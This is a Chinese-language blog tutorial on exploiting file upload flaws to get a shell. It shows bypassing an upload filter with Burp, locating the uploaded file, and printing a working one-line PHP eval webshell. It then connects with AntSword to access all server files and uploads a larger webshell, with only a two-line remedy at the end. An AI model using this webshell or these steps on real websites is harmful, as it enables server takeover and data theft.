文件上传漏洞实战getshell分析 形成 利用 修复

文件上传漏洞利用及分析和修复

 

 

 


前言

文件上传漏洞是指用户上传了一个可执行的脚本文件(php、jsp、xml、cer等文件),而WEB系统没有进行检测或逻辑做的不够安全。 文件上传功能本身没有问题,问题在于上传后如何处理及解释文件。 一般情况下,Web应用都会允许用户上传一些文件,如头像、附件等信息,如果Web应用没有对用户上传的文件进行有效的检查过滤,那么恶意用户就会上传一句话木马等Webshell,从而达到控制Web网站的目的。

 


提示:以下是本篇文章正文内容,下面案例可供参考

一、webshell是什么?

简单说吧,他是正向木马。即为我们主动去找他

二、文件上传漏洞利用实战

1.上传

一般是后台。头像啥的

c40ab72e4a0946839a0081997c4fe744.png

 0e60a5298bca4e079db4076b5918c684.png

好了,我们来找找

9631b8ef2e1e44e6bb15351bae63ac00.png

5f3cd8b4e16742e289843a7e3ad6f2d5.png

OK。如果他限制我们上传,就得用点手段了。。。。

直接burp截包改数据类型,

74a18c3dde684a6d8400fc3118ccf3de.png

 成功~!!

现在。F12开发者工具

03a8ebd23d614170aceceb45e292907e.png

 将元素审查针放到bak1.php

<input type="hidden" name="url1" id="h_url1" value="/uploads/20221220/76b9aff7d53c20d94b7144b77bd08611.php">
下面拼接URL 
http://www.xxx.com/uploads/20221220/76b9aff7d53c20d94b7144b77bd08611.php

以上就是小马地址

<?php
eval($_POST["pass"]);

上蚁剑

c16ffd4fa6ac40f681a843ff522edb4b.png

 

f6ac35f6c8f240a390fbd445f20a1f7f.png

 可访问服务器全部文件

拉大马。并访问

 源码看我之前文

 

1b5a9225ea034b839f5ce9f537d033c0.png

2.防止

加入严格的后端限制

php过滤危险函数

 


 


总结

以上是全部内容,感谢关注。可以私我学习

 

  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值